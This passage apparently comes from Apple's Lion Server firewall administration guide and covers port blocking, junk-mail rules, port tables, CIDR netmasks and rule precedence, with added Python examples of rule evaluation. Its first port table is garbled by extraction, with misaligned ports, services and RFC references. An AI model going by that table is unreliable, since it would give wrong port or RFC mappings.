You can disable P2P networking by blocking incoming and outgoing traffic on the port number used by the P2P application. You must determine the port used for each P2P network in question. By default, Lion Server's firewall blocks ports not specifically opened. Port-based blocking is only as good as the application's port usage; an application that picks random ports or tunnels over ports 80 and 443 is not stopped this way. You can limit P2P network usage to IP addresses behind the firewall. To do so, open the P2P port for your LAN interface but continue to block the port on the interface connected to the Internet (the WAN interface). To learn how to make a firewall rule, see Configure advanced firewall rules (CLI) or Configure advanced firewall rules.

Controlling or enabling network game usage
Sometimes network administrators must control the use of network games. The games might use network bandwidth and resources improperly or disproportionately. You can disable network gaming by blocking incoming and outgoing traffic on the port number used by the game. You must determine the port used for each network game in question. By default, Lion Server's firewall blocks all ports not specifically opened. You can limit network game usage to IP addresses behind the firewall. To do so, open the relevant port on your LAN interface but continue to block the port on the interface connected to the Internet (the WAN interface). Some games require a connection to a gaming service for play, so this might not be effective. You can open the firewall to specific games, permitting network games to connect to other players and game services outside the firewall. To do this, open the relevant port on your LAN and WAN interfaces. Some games require more than one port to be open. For networking details, consult the game's documentation.

Blocking junk mail
This section describes how to reject mail from a junk mail sender with an IP address of 17.128.100.0 (for example) and accept all other Internet mail.

Important: To block incoming SMTP mail, set up specific address ranges in the rules you create. For example, if you set a rule on port 25 to deny mail from all addresses, you prevent mail from being delivered to users.
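The Important note above is a consequence of the evaluation order described under About Firewall service: rules are checked lowest number first and the first match wins. The script below is an added example, not ipfw itself. It models that order with two rule sets, one that denies only the junk sender's network and then allows port 25 from everyone, and the broken one the note warns about, where the deny matches every sender before the allow is ever reached. The /24 on the junk sender is an assumption; the text gives only the address 17.128.100.0.

```python
"""First-match evaluation of firewall rules, with the junk-mail case above.

Added example, not ipfw itself: it models the evaluation order the
Firewall service section describes (lowest-numbered rule first, first match
wins, everything not opened is denied) so the two rule sets can be compared.
The /24 on the junk sender is an assumption; the text gives only 17.128.100.0.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    number: int                      # ipfw rule number; lower numbers are checked first
    action: str                      # "allow" or "deny"
    proto: str                       # "tcp", "udp" or "any"
    src: str                         # source network in CIDR, or "any"
    dst_port: Optional[int] = None   # destination port, None = any port


# Rule set that blocks the junk sender and still accepts everyone else's mail.
JUNK_MAIL_RULES = [
    Rule(1000, "deny", "tcp", "17.128.100.0/24", 25),
    Rule(1100, "allow", "tcp", "any", 25),
]

# Rule set the Important note warns about: the deny matches every sender first.
BROKEN_RULES = [
    Rule(1000, "deny", "tcp", "any", 25),
    Rule(1100, "allow", "tcp", "any", 25),
]


def matches(rule, proto, src, dst_port):
    """True if a packet (protocol, source address, destination port) matches rule."""
    if rule.proto != "any" and rule.proto != proto:
        return False
    if rule.src != "any" and ipaddress.ip_address(src) not in ipaddress.ip_network(rule.src):
        return False
    return rule.dst_port is None or rule.dst_port == dst_port


def evaluate(rules, proto, src, dst_port):
    """Return (action, rule number) of the first matching rule, else the implicit deny.

    ipfw's built-in last rule is number 65535; Firewall service leaves ports
    that were not opened closed, so the fall-through here is a deny.
    """
    for rule in sorted(rules, key=lambda r: r.number):
        if matches(rule, proto, src, dst_port):
            return rule.action, rule.number
    return "deny", 65535


if __name__ == "__main__":
    for name, rules in (("junk-mail rules", JUNK_MAIL_RULES), ("broken rules", BROKEN_RULES)):
        for src in ("17.128.100.44", "203.0.113.5"):
            print(f"{name}: tcp {src} -> port 25 = {evaluate(rules, 'tcp', src, 25)}")
```

Swap the rule numbers in JUNK_MAIL_RULES and the junk sender gets through, because the allow is then evaluated first: the number, not the order you typed the rules in, decides precedence.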


Where to find more information


For more information about accessing and implementing the features of ipfw, the tool that controls Firewall service, see the ipfw man page. Request for Comments (RFC) documents provide an overview of a protocol or service and describe how the protocol should behave. If you're a novice server administrator, you'll probably find the background information in an RFC helpful. If you're an experienced server administrator, you can find the technical details of a protocol in its RFC document. The RFC section of the following website lists RFC numbers for various protocols: www.ietf.org/rfc.html. The Internet Assigned Numbers Authority (IANA) maintains a list of well-known ports and of the TCP and UDP ports it has assigned to various protocols. The list can be found at www.iana.org/assignments/port-numbers. Important multicast addresses were documented in the Assigned Numbers RFC, RFC 1700, which has since been obsoleted by RFC 3232; the current assignments are in the IANA registries.


TCP and UDP port reference


The following tables s how the TCP and UDP port numbers commonly used by Mac OS X computers and Lion Servers . Use these ports when you set up access rules. To view the RFCs referenced in the tables, s ee www.faqs.org/rfcs. 1499
Port 7 TCP, UDP 20 T CP Description Echo FTP data Reference RFC 792 RFC 959

21 T CP 22 T CP, UDP

FTP control Secure Shell (SSH); Open Directory replica setup

RFC 959

23 T CP, UDP 25 T CP, UDP 53 T CP, UDP 67 UDP 68 UDP 69 UDP 79 T CP, UDP 80 T CP 88 T CP, UDP 106 TCP, UDP 110 TCP, UDP 111 TCP, UDP 113 TCP, UDP 115 TCP 119 TCP 123 TCP, UDP 137 TCP, UDP 138 TCP, UDP 139 TCP 143 TCP 161 UDP 192 UDP 201208 TCP 311 TCP

Telnet Mail: SMTP DNS DHCP server (BootP), NetBoot server DHCP client Trivial File Transfer Protocol (T FTP) Finger HTTPweb Kerberos V5 KDC Open Directory Password Server (with 3659) Mail: POP3 Remote Procedure Call (RPC) Authentication service Simple File Transfer Protocol (SFT P) Network News Transfer Protocol (NNTP) Network Time Protocol Windows Name Service (WINS) Windows NETBIOS browsing Windows file and print service (SMB/CIFS) Mail: IMAP Simple Network Management Protocol (SNMP) AirPort administration AppleTalk Server Admin over SSL, AppleShare IP remote web administration, Server Monitor, Server Admin (servermgrd), Workgroup Manager (DirectoryService)

RFC 854 RFC 821 RFC 1034

RFC 1288 RFC 2068 RFC 1510

RFC 1081 RFC 1057 RFC 931

RFC 977 RFC 1305

RFC 100 RFC 2060

389 TCP 407 TCP, UDP 427 TCP, UDP 443 TCP 445 TCP 465 TCP 497 TCP, UDP

LDAP (directory) Timbuktu SLP (Service Location Protocol) HTTPSsecure web over SSL Microsoft Domain Server Mail: SMTP Dantz Retrospect

RFC 2251

5003999
Port 500 UDP Description VPN ISAKMP/IKE Reference

513 UDP 514 TCP 514 UDP 515 TCP 532 TCP 548 TCP 554 TCP, UDP 587 TCP 591 TCP 6001023 TCP, UDP 625 TCP 626 UDP

Who Shell, syslog Syslog LPR print spooling NetNews AFP (Apple Filing Protocol) QTSS RTSP streaming Mail: SMTP submission FileMaker web access Mac OS X RPC-based services Remote Directory Access Serial number support for Snow Leopard Server and earlier RFC 2326 RFC 1179

631 TCP, UDP 636 TCP 660 TCP 687 TCP 749 TCP, UDP

IPP printer sharing LDAP over SSL Server administration using Server Settings Server administration using Server Admin Kerberos administration and changepw using the kadmind command-line tool

985 TCP 993 TCP 995 TCP, UDP 1099, 8043 TCP 1220 TCP 1694 TCP 1701 UDP 1723 TCP 2000 TCP 2049 TCP, UDP 2336 TCP 2399 TCP 3004 TCP 3031 TCP, UDP 3283 TCP, UDP 3306 TCP 3632 TCP 3659 TCP, UDP 3689 TCP 3690 TCP

NetInfo static port Mail: IMAP over SSL Mail: POP3 over SSL Remote RMI and RMI/IIOP access to JBoss QTSS administration IP Failover VPN L2TP VPN PPTP Mail: Custom filtering (sieve) Network File System (NFS) Mobile account sync FileMaker data access layer iSync Program Linking, remote AppleEvents Apple Remote Desktop (with 5900) MySQL XCode distributed compiler Open Directory Password Server (with 106) iT unes music sharing Subversion version control RFC 2637

400050999
Port 4111 TCP 4500 UDP 5003 TCP, UDP 5060 UDP 5100 TCP 5190 TCP UDP Description Xgrid VPN IKE NAT traversal FileMaker name binding and transport iChat session initiation Camera and scanner sharing iChat, AOL Instant Messenger, and iChat file transfer 5222 TCP 5223 TCP 5269 TCP 5297 UDP 5298 TCP, UDP 5678 UDP 5353 UDP 5432 TCP 5900 TCP, UDP iChat Server (Jabber/XMPP) iChat Server (Jabber/XMPP) over SSL iChat Server to server (Jabber/XMPP) iChat local subnet iChat local subnet iChat AV behind NAT Multicast DNS (Bonjour, mDNSResponder) Apple Remote Desktop 2.0 database VNC (Mac OS X screen sharing, Apple Remote Desktop 2.0) 5988, 5989 TCP 69706999 UDP 7070 TCP, UDP Apple Remote Desktop 2.0 CIM/OpenWBEM QTSS RTP streaming QTSS RTSP Automatic Router Configuration Protocol (ARCP) 7777 TCP 80008999 TCP 80008001 TCP 8005 TCP 8008, 8443 TCP 8080 TCP iChat Serverfile transfer proxy Web service QTSS MP3 streaming Tomcat remote shutdown iCal Server and iCal Server SSL HTTPweb service alternative (Apache 2 default) 8088 TCP 8080, 8443, 9006 TCP 8800, 8843 TCP Software Update server Tomcat standalone and JBoss Address Book Server and Address Book Server SSL 9007 TCP 1638416403 UDP 4200042999 TCP 4915265535 TCP 50003 T CP, UDP Tomcat remote web server access to AIP port iChat audio/video RTP and RT CP iT unes radio streams FTP service PASV port range FileMaker Server service (Windows) or daemon (Mac OS X) Reference

50006 T CP, UDP

FileMaker Server Helper service (Windows) or

daemon (Mac OS)

A–Z by service

Port              Protocol   Service
548               TCP        AFP (Apple Filing Protocol)
192               UDP        AirPort administration
3283              TCP, UDP   Apple Remote Desktop (with 5900)
5988, 5989        TCP        Apple Remote Desktop 2.0 CIM/OpenWBEM
5432              TCP        Apple Remote Desktop 2.0 database
201–208           TCP        AppleTalk
113               TCP, UDP   Authentication service
5100              TCP        Camera and scanner sharing
497               TCP, UDP   Dantz Retrospect
68                UDP        DHCP client
67                UDP        DHCP server (BootP), NetBoot server
53                TCP, UDP   DNS
7                 TCP, UDP   Echo
2399              TCP        FileMaker data access layer
5003              TCP, UDP   FileMaker name binding and transport
50006             TCP, UDP   FileMaker Server Helper service (Windows) or daemon (Mac OS)
50003             TCP, UDP   FileMaker Server service (Windows) or daemon (Mac OS X)
591               TCP        FileMaker web access
79                TCP, UDP   Finger
21                TCP        FTP control
20                TCP        FTP data
49152–65535       TCP        FTP service PASV port range
443               TCP        HTTPS secure web over SSL
80                TCP        HTTP web
8080              TCP        HTTP web service alternative (Apache 2 default)
16384–16403       UDP        iChat audio/video RTP and RTCP
5678              UDP        iChat AV behind NAT
5297              UDP        iChat local subnet
5298              TCP, UDP   iChat local subnet
5222              TCP        iChat Server (Jabber/XMPP)
5223              TCP        iChat Server (Jabber/XMPP) over SSL
5269              TCP        iChat Server to server (Jabber/XMPP)
7777              TCP        iChat Server file transfer proxy
5060              UDP        iChat session initiation
5190              TCP, UDP   iChat, AOL Instant Messenger, and iChat file transfer
1694              TCP        IP failover
631               TCP, UDP   IPP printer sharing
3004              TCP        iSync
3689              TCP        iTunes music sharing
42000–42999       TCP        iTunes radio streams
749               TCP, UDP   Kerberos administration and changepw using the kadmind command-line tool
88                TCP, UDP   Kerberos V5 KDC
389               TCP        LDAP (directory)
636               TCP        LDAP over SSL
515               TCP        LPR print spooling
600–1023          TCP, UDP   Mac OS X RPC-based services
2000              TCP        Mail: Custom filtering (sieve)
143               TCP        Mail: IMAP
993               TCP        Mail: IMAP over SSL
110               TCP, UDP   Mail: POP3
995               TCP, UDP   Mail: POP3 over SSL
25                TCP, UDP   Mail: SMTP
587               TCP        Mail: SMTP submission
445               TCP        Microsoft Domain Server
2336              TCP        Mobile account sync
5353              UDP        Multicast DNS (Bonjour, mDNSResponder)
3306              TCP        MySQL
985               TCP        NetInfo static port
532               TCP        NetNews
2049              TCP, UDP   Network File System (NFS)
119               TCP        Network News Transfer Protocol (NNTP)
123               TCP, UDP   Network Time Protocol
3659              TCP, UDP   Open Directory Password Server (with 106)
106               TCP, UDP   Open Directory Password Server (with 3659)
3031              TCP, UDP   Program linking, remote AppleEvents
1220              TCP        QTSS administration
8000–8001         TCP        QTSS MP3 streaming
6970–6999         UDP        QTSS RTP streaming
7070              TCP, UDP   QTSS RTSP Automatic Router Configuration Protocol (ARCP)
554               TCP, UDP   QTSS RTSP streaming
625               TCP        Remote directory access
111               TCP, UDP   Remote procedure call (RPC)
1099, 8043        TCP        Remote RMI and RMI/IIOP access to JBoss
22                TCP, UDP   Secure shell (SSH)
626               UDP        Serial number support for Snow Leopard Server
311               TCP        Server Admin over SSL, AppleShare IP remote web administration, Server Monitor, Server Admin (servermgrd), Workgroup Manager (DirectoryService)
687               TCP        Server administration using Server Admin
660               TCP        Server administration using Server Settings
514               TCP        Shell, syslog
115               TCP        Simple File Transfer Protocol (SFTP)
161               UDP        Simple Network Management Protocol (SNMP)
427               TCP, UDP   SLP (Service Location Protocol)
8088              TCP        Software Update server
3690              TCP        Subversion version control
514               UDP        Syslog
23                TCP, UDP   Telnet
407               TCP, UDP   Timbuktu
8005              TCP        Tomcat remote shutdown
9007              TCP        Tomcat remote web server access to AIP port
8080, 8443, 9006  TCP        Tomcat standalone and JBoss
69                UDP        Trivial File Transfer Protocol (TFTP)
5900              TCP, UDP   VNC (Mac OS X screen sharing, Apple Remote Desktop 2.0)
4500              UDP        VPN IKE NAT traversal
500               UDP        VPN ISAKMP/IKE
1701              UDP        VPN L2TP
1723              TCP        VPN PPTP
8000–8999         TCP        Web service
513               UDP        Who
139               TCP        Windows file and print service (SMB/CIFS)
137               TCP, UDP   Windows Name Service (WINS)
138               TCP, UDP   Windows NETBIOS browsing
3632              TCP        XCode distributed compiler
4111              TCP        Xgrid

Network infrastructure services

Firewall service

Understanding firewalls

Rule mechanism and precedence


The rules in the Firewall Settings Services pane operate with the rules shown in the Advanced pane. Usually, the broad rules in the Advanced pane block access for all ports. These are lower-priority (higher-numbered) rules and are applied after the rules in the Services pane. The rules created with the Services pane open access to specific services and are higher priority. They take precedence over those created in the Advanced pane.

If you create multiple rules in the Advanced pane, the precedence for a rule is determined by the rule number. This number corresponds to the order of the rule in the Advanced pane. Rules can be reordered by dragging them in the list in the Firewall Settings Advanced pane. For most normal uses, opening access to designated services in the Services pane is sufficient. If necessary, add more rules using the Advanced pane.


About the subnet mask


A subnet mask indicates the segments in the specified IP address that can vary on a network and by how much. The subnet mask is given in Classless InterDomain Routing (CIDR) notation. It consists of the IP address followed by a slash (/) and a number from 1 to 32, called the IP prefix. An IP prefix identifies the number of significant bits used to identify a network. For example, 192.168.2.1/16 means that the first 16 bits (the first two sets of numbers separated by periods) are used to represent the network (so every machine on the network begins with 192.168) and the remaining 16 bits (the last two numbers separated by periods) are used to identify hosts. Each machine has a unique set of trailing numbers. Subnet masks can be given in another notation, which is the IP address followed by a colon (:) and the netmask. A netmask is a group of 4 numbers, each from 0 to 255, separated by periods; it is equivalent to the prefix after the slash in CIDR notation. The following table shows the netmask and the number of addresses that correspond to each CIDR prefix.
CIDR   Corresponds to netmask   Number of addresses in the range
/1     128.0.0.0                4.29x10^9
/2     192.0.0.0                2.14x10^9
/3     224.0.0.0                1.07x10^9
/4     240.0.0.0                5.36x10^8
/5     248.0.0.0                1.34x10^8
/6     252.0.0.0                6.71x10^7
/7     254.0.0.0                3.35x10^7
/8     255.0.0.0                1.67x10^7
/9     255.128.0.0              8.38x10^6
/10    255.192.0.0              4.19x10^6
/11    255.224.0.0              2.09x10^6
/12    255.240.0.0              1.04x10^6
/13    255.248.0.0              5.24x10^5
/14    255.252.0.0              2.62x10^5
/15    255.254.0.0              1.31x10^5
/16    255.255.0.0              65536
/17    255.255.128.0            32768
/18    255.255.192.0            16384
/19    255.255.224.0            8192
/20    255.255.240.0            4096
/21    255.255.248.0            2048
/22    255.255.252.0            1024
/23    255.255.254.0            512
/24    255.255.255.0            256
/25    255.255.255.128          128
/26    255.255.255.192          64
/27    255.255.255.224          32
/28    255.255.255.240          16
/29    255.255.255.248          8
/30    255.255.255.252          4
/31    255.255.255.254          2
/32    255.255.255.255          1
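Added example, not from the Apple manual: Python functions that compute the netmask and address-count columns of the table above from the IP prefix, convert between the two address notations the Firewall service accepts (192.168.2.0/24 and 192.168.2.0:255.255.255.0), and test whether an address falls inside a rule's range. The function names are my own; only IPv4 is handled.

```python
# Added example (not from the Apple manual). The helpers below derive the
# table's netmask and address-count columns from the prefix length instead of
# looking them up, and parse the two notations the manual describes.
import ipaddress


def prefix_to_netmask(prefix: int) -> str:
    """Dotted-quad netmask for an IP prefix of 1..32 significant bits."""
    if not 1 <= prefix <= 32:
        raise ValueError("IP prefix must be between 1 and 32")
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF   # top `prefix` bits set
    return ".".join(str((mask >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def netmask_to_prefix(netmask: str) -> int:
    """Inverse of prefix_to_netmask; rejects non-contiguous masks such as 255.0.255.0."""
    octets = [int(o) for o in netmask.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError(f"bad netmask: {netmask}")
    mask = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
    prefix = bin(mask).count("1")
    # A valid netmask is a run of ones followed by a run of zeros.
    if mask != ((0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF):
        raise ValueError(f"non-contiguous netmask: {netmask}")
    return prefix


def addresses_in_range(prefix: int) -> int:
    """Size of the block: 2 ** (32 - prefix), e.g. 256 for /24 and 1 for /32."""
    return 1 << (32 - prefix)


def parse_address_spec(spec: str) -> ipaddress.IPv4Network:
    """Parse a single address, CIDR, or address:netmask into a network.

    strict=False mirrors the manual's 192.168.2.1/16 example, where host bits
    are set in the address: the network is still 192.168.0.0/16."""
    if ":" in spec:                                   # 192.168.2.0:255.255.255.0
        addr, mask = spec.split(":", 1)
        return ipaddress.ip_network(f"{addr}/{netmask_to_prefix(mask)}", strict=False)
    if "/" in spec:                                   # 192.168.2.0/24
        return ipaddress.ip_network(spec, strict=False)
    return ipaddress.ip_network(f"{spec}/32")         # single address 192.168.2.2


def rule_applies(spec: str, address: str) -> bool:
    """Does a rule written with `spec` match traffic from or to `address`?"""
    return ipaddress.ip_address(address) in parse_address_spec(spec)


if __name__ == "__main__":
    for p in (8, 16, 24, 25, 30, 32):
        print(f"/{p:<2} {prefix_to_netmask(p):<16} {addresses_in_range(p)}")
    print(parse_address_spec("192.168.2.0:255.255.255.0"))  # 192.168.2.0/24
    print(rule_applies("192.168.2.1/16", "192.168.77.5"))   # True
```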

Network infrastructure services

Firewall service

Setting up firewalls

Firewall setup overview


After you decide the types of rules to configure, use the following steps to set up Firewall service.

Step 1: Learn and plan
If you're new to working with Firewall service, learn and understand firewall concepts, tools, and features of Lion Server. Then determine which services to provide access to. Mail, Web, and FTP services generally require access from computers on the Internet. File and Print services are more likely to be restricted to your local subnet. After you decide the services to protect using Firewall service, determine the IP addresses you want to access your server and the IP addresses you want to deny. Then configure the suitable rules.

Step 2: Turn Firewall service on
In Server Admin, select Firewall and click Start Firewall. By default, this blocks all incoming ports except those used to configure the server remotely. If you're configuring the server locally, turn off external access immediately.

Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.

Step 3: Configure firewall address groups settings
Create an IP address group that the firewall rules apply to. By default, an IP address group is created for all incoming IP addresses. Rules applied to this group affect all incoming network traffic.

Step 4: Configure firewall service settings
Activate service rules for each address group. In the Services pane, you can activate rules based on address groups as destination IP numbers.

Step 5: Configure firewall logging settings
Use logging settings to enable Firewall service event logging. You can also set what types and how many packets get logged.

Step 6: Configure firewall advanced settings
Configure advanced firewall rules to further configure other services, strengthen network security, and fine-tune your network traffic through the firewall. By default, UDP traffic is blocked, except traffic arriving in response to an outgoing query. Apply rules to UDP ports sparingly, if at all, because denying some UDP responses could inhibit normal networking operations. If you configure rules for UDP ports, don't select Log all allowed packets in the Firewall Logging settings pane in Server Admin. Because UDP is a connectionless protocol, every packet to a UDP port is logged if you select this option.

Step 7: Turn Firewall service on
You turn Firewall service on using Server Admin.

Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.


About firewall rules


What a firewall rule is
A firewall rule is a set of characteristics for an IP packet, coupled with an action to be taken for each packet that matches the characteristics. The characteristics might include the protocol, source or destination address, source or destination port, or network interface. Addresses might be expressed as a single IP address or might include a range of addresses. A service port might be expressed as a single value, a list of values, or a range of values. The IP address and subnet mask determine the range of IP addresses the rule applies to, and can be set to apply to all addresses.

Basic firewall practices
By default, Lion Server uses a simple model for a useful, secure firewall. If a firewall is too restrictive, the network behind it can be too isolated. If a firewall is too permissive, it fails to secure the assets behind it. Adhering to the following aspects of the basic model provides maximum flexibility and utility with minimum risk:

Permit essential IP activity. Essential IP activity includes those network activities necessary to use IP and function in an IP environment. These activities include operations such as loopback and are expressed as high-priority (low-numbered) rules, visible in the Advanced pane of Firewall service settings. These rules are configured for you.

Permit service-specific activity. Service-specific activity refers to network packets destined for specific service ports, such as web or mail services. By permitting traffic to access ports with designated, configured services, you permit access through the firewall on a per-service basis. These services are expressed as medium-priority rules and correspond to check boxes in the Service pane of Firewall settings. You make these changes based on your settings and address groups.

Deny packets not already permitted. This is the final catch-all practice. If a packet or traffic to a port is unsolicited, the packet or traffic is discarded and not permitted to reach its destination. This is expressed as low-priority (high-numbered) rules, visible in the Advanced pane of Firewall service settings. A basic set of deny rules for the firewall is created by default.
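Added example, not from the Apple manual: a small Python model of the first-match-by-rule-number evaluation described under "Rule mechanism and precedence" and of the three tiers listed above (essential, service-specific, catch-all deny). Rule numbers, address groups, ports and interface names are constructed for illustration; only the ordering semantics and the tier layout come from the text.

```python
# Added example (not from the Apple manual): how an ipfw-style ruleset picks
# the rule that decides a packet. Numbers and addresses are constructed.
import ipaddress
from dataclasses import dataclass
from typing import Optional

ANY = "any"


@dataclass(frozen=True)
class Packet:
    proto: str        # "tcp", "udp" or "icmp"
    src: str          # source IP address
    dst: str          # destination IP address
    dport: int        # destination port (0 for protocols without ports)
    iface: str = "en0"


@dataclass(frozen=True)
class Rule:
    number: int                   # 1..65535; lower number = higher priority
    action: str                   # "allow" or "deny"
    proto: str = "ip"             # "ip" matches every protocol
    src: str = ANY                # "any" or CIDR, e.g. "192.168.0.0/16"
    dst: str = ANY
    dport: Optional[int] = None   # None = any destination port
    iface: Optional[str] = None   # None = any interface

    @staticmethod
    def _addr_ok(spec: str, addr: str) -> bool:
        if spec == ANY:
            return True
        # strict=False accepts entries like the manual's 192.168.2.1/16.
        return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

    def matches(self, pkt: Packet) -> bool:
        return (
            self.proto in ("ip", pkt.proto)
            and self._addr_ok(self.src, pkt.src)
            and self._addr_ok(self.dst, pkt.dst)
            and (self.dport is None or self.dport == pkt.dport)
            and (self.iface is None or self.iface == pkt.iface)
        )


def evaluate(rules: list, pkt: Packet) -> tuple:
    """Return (rule number, action) of the first matching rule in number order.

    The order in which rules were added is irrelevant: the firewall walks them
    by number, so a Services-pane rule in the 1000s beats an Advanced-pane
    deny in the 60000s even if the deny was created first."""
    for rule in sorted(rules, key=lambda r: r.number):
        if rule.matches(pkt):
            return rule.number, rule.action
    raise LookupError("ruleset has no catch-all rule")


def build_ruleset(service_ports: dict) -> list:
    """Lay out the three tiers from 'Basic firewall practices'.

    service_ports maps an address group ("any" or CIDR) to the TCP ports the
    Services pane check boxes opened for it. Rule numbers are constructed."""
    rules = [Rule(10, "allow", iface="lo0")]          # essential: loopback
    number = 1000
    for group, ports in service_ports.items():        # service-specific tier
        for port in ports:
            rules.append(Rule(number, "allow", "tcp", src=group, dport=port))
            number += 10
    rules.append(Rule(65000, "deny"))                 # catch-all: deny the rest
    return rules


if __name__ == "__main__":
    rs = build_ruleset({"192.168.0.0/16": [22, 548], ANY: [80]})
    print(evaluate(rs, Packet("tcp", "192.168.2.2", "192.168.2.1", 22)))   # (1000, 'allow')
    print(evaluate(rs, Packet("tcp", "203.0.113.9", "192.168.2.1", 22)))   # (65000, 'deny')
    print(evaluate(rs, Packet("tcp", "203.0.113.9", "192.168.2.1", 80)))   # (1020, 'allow')
```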


Start Firewall service (CLI)


You can use serveradmin to start the service. Before you turn on Firewall service, make sure you've set up rules permitting access from IP addresses you choose; otherwise, no one can access your server. By default, Firewall service blocks incoming TCP connections and denies UDP packets, except those received in response to outgoing requests from the server. If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.

sudo serveradmin start ipfilter


Start Firewall service


You can use Server Admin to start the service. Before you turn on Firewall service, make sure you've set up rules permitting access from IP addresses you choose; otherwise, no one can access your server. By default, Firewall service blocks incoming TCP connections and denies UDP packets, except those received in response to outgoing requests from the server. If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Below the Servers list, click the Start Firewall button.


Stop Firewall service (CLI)


You use serveradmin to stop Firewall service.

sudo serveradmin stop ipfilter


Stop Firewall service


You use Server Admin to stop Firewall service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Stop Firewall.
5. Click Stop Now.


Enable firewall administration


Before you can configure firewall settings, you must turn Firewall service on in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Select the Firewall checkbox.
5. Click Save.

Network infrastructure services

Firewall service

Configuring firewalls

Configure advanced firewall rules (CLI)


You use the Advanced Settings pane in Server Admin to configure specific rules for Firewall service. Firewall rules contain originating and destination IP addresses with subnet masks. They also specify what to do with incoming network traffic. You can apply a rule to all IP addresses, a specific IP address, or a range of IP addresses. Addresses can be listed as individual addresses (192.168.2.2), IP address and subnet mask in CIDR notation (192.168.2.0/24), or IP address and subnet mask in netmask notation (192.168.2.0:255.255.255.0).
Parameter          Description
rule               A unique rule number.
Other parameters   The standard rule settings described under Firewall command-line parameters.

Add a rule:
$ sudo serveradmin settings
ipfilter:rules:_array_id:rule = create
ipfilter:rules:_array_id:rule:source = source
ipfilter:rules:_array_id:rule:protocol = protocol
ipfilter:rules:_array_id:rule:destination = destination
ipfilter:rules:_array_id:rule:action = action
ipfilter:rules:_array_id:rule:enableLocked = (yes|no)
ipfilter:rules:_array_id:rule:enabled = (yes|no)
ipfilter:rules:_array_id:rule:log = (yes|no)
ipfilter:rules:_array_id:rule:readOnly = (yes|no)
ipfilter:rules:_array_id:rule:source-port = port
Control-D


Configure advanced firewall rules


You use the Advanced Settings pane in Server Admin to configure specific rules for Firewall service. Firewall rules contain originating and destination IP addresses with subnet masks. They also specify what to do with incoming network traffic. You can apply a rule to all IP addresses, a specific IP address, or a range of IP addresses. Addresses can be listed as individual addresses (192.168.2.2), IP address and subnet mask in CIDR notation (192.168.2.0/24), or IP address and subnet mask in netmask notation (192.168.2.0:255.255.255.0).

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Advanced.
5. Click the Add button (+). Alternatively, you can select a rule similar to the one you want to create, click Duplicate, and then click Edit.
6. In the Action pop-up menu, select whether this rule permits or denies access. If you choose Other, enter the action desired (for example, log).
7. From the Protocol pop-up menu, choose a protocol. If you choose Other, enter the protocol desired (for example, icmp, esp, ipencap).
8. From the Service pop-up menu, choose a service. To select a nonstandard service port, choose Other.
9. If needed, choose to log all packets that match the rule.
10. For the source of filtered traffic, choose an address group from the Source:Address pop-up menu. If you don't want to use an existing address group, choose Other and enter the source IP address range (using CIDR notation) to filter. If you want it to apply to any address, choose any from the pop-up menu.
11. If you selected a nonstandard service port, enter the source port number.
12. For the destination of filtered traffic, choose an address group from the Destination:Address pop-up menu. If you don't want to use an existing address group, choose Other and enter the destination IP address range (using CIDR notation). If you want it to apply to any address, choose any from the pop-up menu.
13. If you selected a nonstandard service port, enter the destination port number.
14. From the Interface pop-up menu that this rule will apply to, choose In or Out. In refers to the packets being sent to the server. Out refers to the packets being sent from the server.
15. If you select Other, enter the interface name (en0, en1, fw1, and so on).
16. Click OK.
17. Click Save to apply the rule immediately.


About firewall rules in the ipfw configuration file


An ipfw configuration, or ruleset, is made of a list of rules numbered from 1 to 65535. The file where you can define your rules is /etc/ipfilter/ipfw.conf. Firewall service reads this file but doesn't modify it. Its contents are annotated and include commented-out rules you can use as models. Packets are passed to ipfw from a number of places in the protocol stack. (Depending on the source and destination of the packet, ipfw can be invoked multiple times on the same packet.) The packet passed to the firewall is compared with each rule in the firewall ruleset. When a match is found, the action corresponding to the matching rule is performed.

Important: Misconfiguring the firewall can put your computer in an unusable state, possibly shutting down network services and requiring console access to regain control of it.

You can configure ipfw with a variety of commands. For information about command-line parameters, see Firewall command-line parameters. For information about serveradmin and ipfw, see their man pages.


Edit or delete advanced firewall rules

You can remove or edit advanced firewall rules. If you think you'll use a rule again and only want to disable it, you can deselect the rule rather than deleting it. If you edit a rule after turning on Firewall service, your changes affect connections established with the server. For example, if computers are connected to your web server and you change the rule to deny all access to the server, connected computers are disconnected.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Advanced.
5. To edit the services list, click the Edit button (/) below the Advanced Rules list, edit the rule as needed, and then click OK.
6. To delete a rule, click the Delete button (–) below the Advanced Rules list. Default rules, designated by the lock icon, cannot be edited or deleted.
7. Click Save.


Edit or delete items in the services list


You can remove or edit ports in the Services list. This enables you to customize service choices for your convenience.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Services.
5. Select the service you want to change, then do the following:
   a. To edit the service list, click the Edit button (/) below the services list.
   b. To delete the service list, click the Delete button (–) below the services list.
6. Edit the name, port, or protocol as needed, and click OK.
7. Click Save.


Configure for standard services (CLI)


